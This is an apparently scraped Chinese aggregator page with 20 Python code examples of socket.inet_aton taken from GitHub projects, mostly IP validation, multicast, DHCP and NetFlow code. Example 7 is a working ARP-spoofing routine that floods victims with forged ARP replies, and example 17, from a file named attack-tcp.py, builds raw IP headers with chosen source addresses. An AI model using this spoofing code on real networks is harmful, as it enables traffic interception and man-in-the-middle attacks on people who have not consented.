本文整理汇总了Python中socket.inet_aton函数的典型用法代码示例。如果您正苦于以下问题:Python inet_aton函数的具体用法?Python inet_aton怎么用?Python inet_aton使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了inet_aton函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。
示例1: create_socket
def create_socket(multicast_ip, port, local_ip):
# create a UDP socket
my_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# allow reuse of addresses
my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# set multicast interface to local_ip
my_socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.inet_aton(local_ip))
# Set multicast time-to-live to 1
# This is to stop data from escaping the local network
my_socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
# Construct a membership request...tells router what multicast group we want to subscribe to
membership_request = socket.inet_aton(multicast_ip) + socket.inet_aton(local_ip)
# Send add membership request to socket
# See http://www.tldp.org/HOWTO/Multicast-HOWTO-6.html for explanation of sockopts
my_socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership_request)
# Bind the socket to an interface.
# If you bind to a specific interface on the Mac or Linux, no multicast data will arrive
# If you try to bind to all interfaces on Windows, no multicast data will arrive
if sys.platform.startswith("darwin") or sys.platform.startswith("linux"):
my_socket.bind(("0.0.0.0", port))
else:
my_socket.bind((local_ip, port))
return my_socket
开发者ID:keiko2678,项目名称:Libellus-src,代码行数:29,代码来源:libellus_multicast.py
示例2: ip_address
def ip_address(string):
"""Verifies if string is a valid IP address"""
try:
socket.inet_aton(string)
except socket.error:
raise argparse.ArgumentTypeError("Not a valid IPv4 address")
return string
开发者ID:FI-Lab,项目名称:ovs,代码行数:7,代码来源:args.py
示例3: check_argument_input
def check_argument_input(argument_input_list):
if len(argument_input_list) != 2:
print 'Usage : python {} [IP:PORT]' .format(argument_input_list[0])
sys.exit(1)
elif ":" not in argument_input_list[1]:
print 'Usage : [IP:PORT] ({})' .format(argument_input_list[1])
sys.exit(1)
elif argument_input_list[1].count(':') > 1:
print 'Usage : [IP:PORT] ({})' .format(argument_input_list[1])
sys.exit(1)
host_name_and_port = argument_input_list[1].split(":")
if not host_name_and_port[0] or \
not host_name_and_port[1]:
print 'Usage : python {} [IP:PORT]' .format(argument_input_list[0])
sys.exit(1)
if not host_name_and_port[1].isdigit() or \
int(host_name_and_port[1]) < 0 or \
int(host_name_and_port[1]) > 65535:
print 'Please enter a valid port number : ({})' .format(host_name_and_port[1])
sys.exit(1)
try:
socket.inet_aton(host_name_and_port[0])
except socket.error:
print 'Please use a valid IP syntax: {}' .format(host_name_and_port[0])
sys.exit(1)
return host_name_and_port[0], int(host_name_and_port[1])
开发者ID:thanos1983,项目名称:Python2-TCP-Chat-Server-Multiple-Clients,代码行数:32,代码来源:server.py
示例4: valid_ipv4
def valid_ipv4(self):
try:
socket.inet_aton(self.host)
return True
except:
print "The format of hostip is not correctly"
return False
开发者ID:murphy-wang,项目名称:Mydb,代码行数:7,代码来源:Mylogin.py
示例5: is_ip
def is_ip(address):
try:
socket.inet_aton(address)
ip = True
except socket.error:
ip = False
return ip
开发者ID:SeungWan,项目名称:paparazzi,代码行数:7,代码来源:ardrone2.py
示例6: __init__
def __init__(self, dp, sp, da, sa):
super(GPRSActionPushUDPIP,self).__init__(0x0003)
self.len = 24
self.sp = sp
self.dp = dp
self.da = socket.inet_aton(da)
self.sa = socket.inet_aton(sa)
开发者ID:unifycore,项目名称:ryu,代码行数:7,代码来源:magic.py
示例7: arp_spoof
def arp_spoof(self, ip_poison, ip_victims=[], local_mac=None, interface="wlan0"):
if ip_poison:
sock_arp_spoof = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0806))
sock_arp_spoof.bind((interface, socket.htons(0x0806)))
if local_mac:
mac_source = local_mac
else: mac_source = self.get_local_mac_address()
code ='\x08\x06'
htype = '\x00\x01'
protype = '\x08\x00'
hsize = '\x06'
psize = '\x04'
opcode = '\x00\x02'
ip_poison_formated = socket.inet_aton(ip_poison)
if ip_victims:
mac_victims = self.get_mac_address(ip_victims)
arp_victims = {}
for ip_address in mac_victims:
ip_address_formated = socket.inet_aton(ip_address)
eth = mac_victims[ip_address] + mac_source + code
arp_victim = eth + htype + protype + hsize + psize + opcode + mac_source + ip_poison_formated + mac_victims[ip_address] + ip_address_formated
arp_victims[ip_address] = arp_victim
else:
pass #send all ip network Ex:192.168.1.0 mac_dest = '\xFF\xFF\xFF\xFF\xFF\xFF'
while True:
for arp_victim in arp_victims:
sock_arp_spoof.send(arp_victim)
开发者ID:sackufpi,项目名称:python-security,代码行数:29,代码来源:raw_socket_sniff_example.py
示例8: __init__
def __init__(self, address=None, netmask=None, nameservers=None, gateway=None, domain=None, globals=None, entries=None):
self.domain = domain
self.address = inet_aton(address)
self.netmask = inet_aton(netmask)
self.broadcast = bytes([(a | ~b & 255) for (a, b) in zip(self.address, self.netmask)])
if nameservers:
self.resolvers = bytearray()
for ns in nameservers:
self.resolvers.extend(inet_aton(ns))
else:
self.resolvers = None
if gateway:
self.gateway = inet_aton(gateway)
else:
self.gateway = None
self.leases = {}
self.offers = {}
self.globals = globals if globals else {}
self.entries = entries if entries else {}
self.reserved = {}
for (k, v) in self.entries.items():
addr = v.get('address')
if addr:
self.reserved[inet_aton(addr)] = True
开发者ID:vognev,项目名称:dhns,代码行数:30,代码来源:middlewares.py
示例9: addressInNetwork
def addressInNetwork(ip,net):
""" Check if IpParam is an address in a network (works for ipv6 ::1)"""
ipaddr = struct.unpack('I',socket.inet_aton(ip))[0]
netaddr,bits = net.split('/')
netmask = struct.unpack('I',socket.inet_aton(netaddr))[0] & ((2L<<int(bits)-1) - 1)
return ipaddr & netmask == netmask
开发者ID:eagleamon,项目名称:alfred,代码行数:7,代码来源:handlers.py
示例10: registerActuator
def registerActuator():
global acuator_registry
try:
request_data = request.json
except ValueError:
return HTTPResponse(status=400, body="Request body must be valid JSON")
if request_data is None:
return HTTPResponse(status=400, body="Request body must be valid JSON")
ip_addr = request_data.get("IP")
if ip_addr is None:
return HTTPResponse(status=400, body="Request body must contain IP address")
try:
socket.inet_aton(ip_addr) # Quick & dirty way to validate an IP address
except socket.error:
return HTTPResponse(status=400, body="Improperly formatted IP address")
name = request_data.get("Name")
if name is None:
return HTTPReponse(status=400, body="Request body must contain name")
actuator_registry[name] = ip_addr
header = {"Content-Type" : "application/json"}
timestamp = getCurrentTime()
return HTTPResponse(status=201, body=json.dumps(timestamp), headers=header)
开发者ID:nikhildps,项目名称:CS262-249-Project,代码行数:25,代码来源:zoneController.py
示例11: outgoing_packet_handler
def outgoing_packet_handler(src_port, dst_addr, dst_port, data):
udp_frag = udp.Packet(sport=src_port, dport=dst_port, data=data)
udp_assembled = udp.assemble(udp_frag, False)
pseudo_header = socket.inet_aton(local_ip) + socket.inet_aton(dst_addr) + '\x00\x11' + struct.pack('!H', len(udp_assembled))
cksum = inetutils.cksum(pseudo_header + udp_assembled)
udp_assembled_with_cksum = udp_assembled[:6] + struct.pack('H', cksum) + udp_assembled[8:]
out_sk.sendto(udp_assembled_with_cksum, (dst_addr, 0))
开发者ID:fabio-d,项目名称:honeypot,代码行数:7,代码来源:udp_raw_agent.py
示例12: send
def send(self, data, dest=None):
"""Sends over UDP socket, if no destination address is found,
multicast address is used"""
if dest == None and self.__dest == None and self.__intfs != None:
dest = (MCAST_ADDR, PORT)
if len(self.__intfs) > 0:
for intf in self.__intfs:
self.__sock.setsockopt(socket.SOL_IP,
socket.IP_MULTICAST_IF, socket.inet_aton(intf))
self.__sock.sendto(data, dest)
else:
# let OS determine default interface
self.__sock.sendto(data, dest)
# hack for socialvpn
try:
self.__sock.setsockopt(socket.SOL_IP,
socket.IP_MULTICAST_IF, socket.inet_aton('172.31.0.2'))
self.__sock.sendto(data, dest)
except Exception as ex:
logging.exception(ex)
elif dest == None and self.__dest != None:
dest = self.__dest
self.__sock.sendto(data, dest)
elif dest != None:
self.__sock.sendto(data, dest)
logging.debug('UDP send : %s : %s' % (dest, data))
return dest
开发者ID:austinxw,项目名称:litter,代码行数:32,代码来源:litterrouter.py
示例13: getNetworkAddr
def getNetworkAddr():
ip = getIP()
netmark = getNetmark()
ipBit = unpack( 'L', inet_aton( ip ) )[0]
netmarkBit = unpack( 'L', inet_aton( netmark ) )[0]
return inet_ntoa( pack( 'L', ipBit & netmarkBit ) )
开发者ID:1987mxy,项目名称:InternatofThings_ServiceCenter,代码行数:7,代码来源:Tools.py
示例14: record_parse
def record_parse(self, item):
record = {
'src_addr': {'format': '!I', 'offset': 0, 'value': 0},
'dst_addr': {'format': '!I', 'offset': 4, 'value': 0},
'next_hop': {'format': '!I', 'offset': 8, 'value': 0},
'input_idx': {'format': '!H', 'offset': 12, 'value': 0},
'output_idx': {'format': '!H', 'offset': 14, 'value': 0},
'pkts': {'format': '!I', 'offset': 16, 'value': 0},
'octets': {'format': '!I', 'offset': 20, 'value': 0},
'first_time': {'format': '!I', 'offset': 24, 'value': 0},
'last_time': {'format': '!I', 'offset': 28, 'value': 0},
'src_port': {'format': '!H', 'offset': 32, 'value': 0},
'dst_port': {'format': '!H', 'offset': 34, 'value': 0},
'pad1': {'format': 'B', 'offset': 36, 'value': 0},
'tcp_flags': {'format': 'B', 'offset': 37, 'value': 0},
'protocol': {'format': 'B', 'offset': 38, 'value': 0},
'tos': {'format': 'B', 'offset': 39, 'value': 0},
'src_as': {'format': '!H', 'offset': 40, 'value': 0},
'dst_as': {'format': '!H', 'offset': 42, 'value': 0},
'src_mask': {'format': 'B', 'offset': 44, 'value': 0},
'dst_mask': {'format': 'B', 'offset': 45, 'value': 0},
'pad2': {'format': '!H', 'offset': 46, 'value': 0}
}
record['protocol']['value'] = item['protocol']
record['src_addr']['value'] = struct.unpack('!I',
socket.inet_aton(item['sourceip']))[0]
record['dst_addr']['value'] = struct.unpack('!I',
socket.inet_aton(item['destip']))[0]
record['src_port']['value'] = item['sport']
record['dst_port']['value'] = item['dport']
# Parse record from FlowRecordTable
#record['pkts']['value'] = item['agg-packets']
#record['octets']['value'] = item['agg-bytes']
#record['first_time']['value'] = (
# int(item['setup_time'] / 1000) - self.boot_time_ms)
#if record['first_time']['value'] < 0:
# record['first_time']['value'] = 0
#if item['teardown_time'] > 0:
# record['last_time']['value'] = (
# int(item['teardown_time'] / 1000) - self.boot_time_ms)
# if record['last_time']['value'] < 0:
# record['last_time']['value'] = 0
# Parse record from FlowSeriesTable
record['pkts']['value'] = item['packets']
record['octets']['value'] = item['bytes']
record['first_time']['value'] = (
int(item['T'] / 1000) - self.boot_time_ms)
if record['first_time']['value'] < 0:
record['first_time']['value'] = 0
# Fake last time.
record['last_time']['value'] = record['first_time']['value'] + \
random.randint(1, 100)
self.record_list.append(record)
self.record_count += 1
if (self.record_count == 30):
self.record_send()
开发者ID:FooBarQuaxx,项目名称:orch,代码行数:60,代码来源:netflow-agent.py
示例15: GetNetworkInterfaces
def GetNetworkInterfaces():
interfaces = list()
try:
objWMIService = win32com.client.Dispatch("WbemScripting.SWbemLocator")
objSWbemServices = objWMIService.ConnectServer(".", "root\cimv2")
adapters = objSWbemServices.ExecQuery(
"SELECT * FROM Win32_NetworkAdapterConfiguration")
for adapter in adapters:
if adapter.IPEnabled:
inet = []
inet6 = []
if adapter.IPAddress:
for ip in adapter.IPAddress:
try:
socket.inet_aton(ip)
inet.append(ip)
except socket.error:
# Assume IPv6 if parsing as IPv4 was failed.
inet6.append(ip)
interfaces.append({
'name': adapter.Description,
'inet': inet,
'inet6': inet6,
'hw': adapter.MacAddress.lower().replace('-', ':')})
except:
logging.exception("Error retrieving network interfaces.")
return merge_duplicate_interfaces(interfaces)
开发者ID:vanloswang,项目名称:ovirt-guest-agent,代码行数:27,代码来源:GuestAgentWin32.py
示例16: _verify_path_your_ip_args
def _verify_path_your_ip_args(self, fields):
"""Verify /your_ip request's arguments
Make sure that the POST arguments send by the client while requesting
for /your_ip path are valid.
Args:
fields: decoded POST arguments sent by the client in the form of
dictionary
Raises:
RequestProcessingException: some/all arguments are missing and/or
malformed. Request should be aborted.
"""
if "reflector_ip" not in fields or "reflector_port" not in fields:
raise RequestProcessingException(400, 'Reflector data missing',
'Reflector IP and/or port has not '
'been provided, so the request cannot '
'be processed.')
fields['reflector_ip'] = fields['reflector_ip'][0]
fields['reflector_port'] = fields['reflector_port'][0]
try:
fields['reflector_port'] = int(fields['reflector_port'])
except ValueError:
msg = 'Reflector port "{}" is not an integer'
raise RequestProcessingException(400, msg.format(fields['reflector_port']))
try:
socket.inet_aton(fields['reflector_ip'])
except socket.error:
msg = 'Reflector IP "{}" is invalid/not a proper ipv4'
raise RequestProcessingException(400, msg.format(fields['reflector_ip']))
开发者ID:Blackbaud-IanThomas,项目名称:dcos,代码行数:34,代码来源:test_server.py
示例17: build_ip_header
def build_ip_header(datalength, srcIP, dstIP):
version = 4 # 4 bits
headerlen = 5 # 5*32bits = 20 bytes # 4 bits
dscp = 0 # 6 bits
ecn = 0 # disable capability # 2 bits
totalLength = datalength + 20 # 16 bits
identification = 22641 # random # 16 bits
flags = 0 # 3 bits
fragmentOffset = 0 # 13 bits
ttl = 64 # 8 bits
proto = 6 # 8 bits
chksum = 0 # initial value # 16 bits
srcIP = socket.inet_aton(srcIP) # 32 bits
dstIP = socket.inet_aton(dstIP) # 32 bits
# Convert fields to binary
version_headerlen = chr(((version & 0xf) << 4) | headerlen & 0x0f)
dscp_ecn = "\0"
totalLen = struct.pack("!H", totalLength)
ident = "xD"
flags_fragmentOffset = "\0\0"
ttl = chr(64)
proto = chr(6)
chksum = "\0\0"
without_checksum = version_headerlen + dscp_ecn + totalLen + ident + flags_fragmentOffset + ttl + proto + chksum + srcIP + dstIP
chksum = checksum(without_checksum)
if chksum == 0:
chksum = 0xffff
return without_checksum[:10] + chr(chksum >> 8) + chr(chksum & 0xff) + without_checksum[12:]
开发者ID:623665910,项目名称:python,代码行数:30,代码来源:attack-tcp.py
示例18: edit_ip_address
def edit_ip_address(self, controlID):
relevant_label_control = self.getControl(900000 + controlID)
current_label = relevant_label_control.getLabel()
if current_label == '___ : ___ : ___ : ___':
current_label = ''
user_input = DIALOG.input(lang(32004), current_label, type=xbmcgui.INPUT_IPADDRESS)
if not user_input or user_input == '0.0.0.0':
relevant_label_control.setLabel(current_label)
else:
# validate ip_address format
try:
socket.inet_aton(user_input)
except:
'The address provided is not a valid IP address.', 'OSMC Network Setup'
ok = DIALOG.ok(lang(32004), lang(32005))
self.edit_ip_address(controlID)
return
# ip_string = ' : '.join(str(user_input).split('.'))
relevant_label_control.setLabel(user_input)
return
开发者ID:Imohamed,项目名称:osmc,代码行数:30,代码来源:networking_gui.py
示例19: incrementclientip
def incrementclientip():
netparts = []
iplist = []
startip = 2
#p = subprocess.Popen(['/usr/local/openvpn_as/scripts/confdba', '-s'], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
#tmpdba, err = p.communicate()
#confdba = ast.literal_eval(tmpdba)
p = subprocess.Popen(['cat', '/root/bin/confdbas.txt'], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
tmpdba, err = p.communicate()
confdba = ast.literal_eval(tmpdba)
for key1,val1 in confdba.items():
if key1 == 'Default':
if isinstance(val1, dict):
for key2,val2 in val1.items():
if key2 == 'vpn.server.static.0.network':
network = val1.get('vpn.server.static.0.network', None)
netmask = val1.get('vpn.server.static.0.netmask_bits', None)
startipdec = ip2int(network) #decimal form of the network address
maxclients = pow(2,(32 - int(netmask))) - startip #decimal form of the number of hosts with given mask
print maxclients
minipdec = startipdec + startip + 8192 #lowest ip in decimal format
maxipdec = startipdec + maxclients + startip - 2 + 8192 #highest ip in decimal format
minip = int2ip(minipdec) #lowest ip in dotted notation
maxip = int2ip(maxipdec) #highest ip in dotted notation
#p = subprocess.Popen(['/usr/local/openvpn_as/scripts/confdba', '-us'], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
#tmpdba, err = p.communicate()
#userdba = ast.literal_eval(tmpdba)
p = subprocess.Popen(['cat', '/root/bin/confdbaus.txt'], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
tmpdba, err = p.communicate()
userdba = ast.literal_eval(tmpdba)
for key1,val1 in userdba.items():
if isinstance(val1, dict):
for key2,val2 in val1.items():
usertype = val1.get(key2, val2)
if usertype == 'user_connect' or usertype == 'user_compile':
userip = val1.get('conn_ip', None)
if userip:
try:
socket.inet_aton(userip) #Makes sure the groups are in IPv4 network form for sorted below
iplist.append(userip)
except:
pass
for seqdec in range(minipdec, maxipdec):
seqip = int2ip(seqdec)
if checkip(seqip, iplist):
pass
else:
newclientip = seqip
break
print newclientip
return newclientip
开发者ID:grantmcwilliams,项目名称:VPNMagic,代码行数:60,代码来源:vpnmagic-as.py
示例20: _parse_options
def _parse_options(options):
packet = ''
for option in options:
code, value = option
# with single byte value
if code in [__OPTION_MESSAGE_TYPE__]:
packet += (struct.pack("!3B", code ,1,value))
continue
# with single ip address as value
if code in [__OPTION_NETMASK__, __OPTION_BROADCAST_ADDRESS__, __OPTION_SERVER_IDENTIFIER__,__OPTION_REQUESTED_ADDRESS__]:
packet += (struct.pack("!2B", code, 4)+socket.inet_aton(value))
continue
# with multiple ip address as value
if code in [__OPTION_ROUTERS__, __OPTION_NTP_SERVERS__, __OPTION_DNS_SERVERS__]:
if len(value) == 0: continue # continue if no ip specified
packet += (struct.pack("!2B", code, 4*len(value)))
for address in value:
packet += socket.inet_aton(address)
continue
# time relevent
if code in [__OPTION_LEASE_TIME__, __OPTION_RENEW_TIME__, __OPTION_REBIND_TIME__]:
packet += struct.pack("!2BI", code, 4, value)
continue
# other options, for now just concat them to the packet
# developer should take care of the null character in the end
packet += (struct.pack("!2B", code, len(value))+value)
return packet
开发者ID:frankurcrazy,项目名称:pydhcpd,代码行数:33,代码来源:dhcp_packet.py
注:本文中的socket.inet_aton函数示例由纯净天空整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
请发表评论